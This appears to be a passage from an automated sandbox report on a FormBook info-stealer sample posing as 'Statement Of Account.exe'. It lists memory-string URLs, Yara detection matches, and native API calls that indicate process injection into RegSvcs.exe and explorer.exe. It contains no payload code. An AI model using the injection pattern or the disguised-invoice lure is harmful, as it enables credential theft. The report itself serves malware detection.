          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
          .NET source code contains very large strings
          Source: Statement Of Account.exe, Form1.csLong String: Length: 129808
          Source: SdYCcXyq.exe.0.dr, Form1.csLong String: Length: 129808
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk,8_2_00FB2AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_00FB2BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2B60 NtClose,LdrInitializeThunk,8_2_00FB2B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_00FB2CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_00FB2C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_00FB2DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2DD0 NtDelayExecution,LdrInitializeThunk,8_2_00FB2DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_00FB2D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_00FB2D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_00FB2EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_00FB2E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2FE0 NtCreateFile,LdrInitializeThunk,8_2_00FB2FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2FB0 NtResumeThread,LdrInitializeThunk,8_2_00FB2FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2F90 NtProtectVirtualMemory,LdrInitializeThunk,8_2_00FB2F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2F30 NtCreateSection,LdrInitializeThunk,8_2_00FB2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB4340 NtSetContextThread,8_2_00FB4340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB4650 NtSuspendThread,8_2_00FB4650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2AF0 NtWriteFile,8_2_00FB2AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2AB0 NtWaitForSingleObject,8_2_00FB2AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2BE0 NtQueryValueKey,8_2_00FB2BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2BA0 NtEnumerateValueKey,8_2_00FB2BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2B80 NtQueryInformationFile,8_2_00FB2B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2CF0 NtOpenProcess,8_2_00FB2CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2CC0 NtQueryVirtualMemory,8_2_00FB2CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2C60 NtCreateKey,8_2_00FB2C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2C00 NtQueryInformationProcess,8_2_00FB2C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2DB0 NtEnumerateKey,8_2_00FB2DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2D00 NtSetInformationFile,8_2_00FB2D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2EE0 NtQueueApcThread,8_2_00FB2EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2E30 NtWriteVirtualMemory,8_2_00FB2E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2FA0 NtQuerySection,8_2_00FB2FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2F60 NtCreateProcessEx,8_2_00FB2F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB3090 NtSetValueKey,8_2_00FB3090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB3010 NtOpenDirectoryObject,8_2_00FB3010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB35C0 NtCreateMutant,8_2_00FB35C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB39B0 NtGetContextThread,8_2_00FB39B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB3D70 NtOpenThread,8_2_00FB3D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB3D10 NtOpenProcessToken,8_2_00FB3D10
          Source: C:\Windows\explorer.exeCode function: 9_2_0F905E12 NtProtectVirtualMemory,9_2_0F905E12
          Source: C:\Windows\explorer.exeCode function: 9_2_0F904232 NtCreateFile,9_2_0F904232
          Source: C:\Windows\explorer.exeCode function: 9_2_0F905E0A NtProtectVirtualMemory,9_2_0F905E0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A360 NtCreateFile,14_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A410 NtReadFile,14_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A490 NtClose,14_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A540 NtAllocateVirtualMemory,14_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A35A NtCreateFile,14_2_0041A35A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A53B NtAllocateVirtualMemory,14_2_0041A53B
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_014ADCD40_2_014ADCD4
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A2B4E80_2_07A2B4E8
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A2B4D80_2_07A2B4D8
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A294780_2_07A29478
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A2B0B00_2_07A2B0B0
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A2B09F0_2_07A2B09F
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A2BE980_2_07A2BE98
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A20C490_2_07A20C49
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A20C580_2_07A20C58
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A298A30_2_07A298A3
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A298B00_2_07A298B0
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_07A228380_2_07A22838
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A1188_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010081588_2_01008158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010341A28_2_010341A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010401AA8_2_010401AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010381CC8_2_010381CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010120008_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F701008_2_00F70100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A3528_2_0103A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010403E68_2_010403E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F08_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010202748_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010002C08_2_010002C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010405918_2_01040591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010244208_2_01024420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010324468_2_01032446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F805358_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102E4F68_2_0102E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9C6E08_2_00F9C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7C7C08_2_00F7C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F807708_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA47508_2_00FA4750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE8F08_2_00FAE8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F668B88_2_00F668B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104A9A68_2_0104A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A8408_2_00F8A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F828408_2_00F82840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A08_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F969628_2_00F96962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103AB408_2_0103AB40
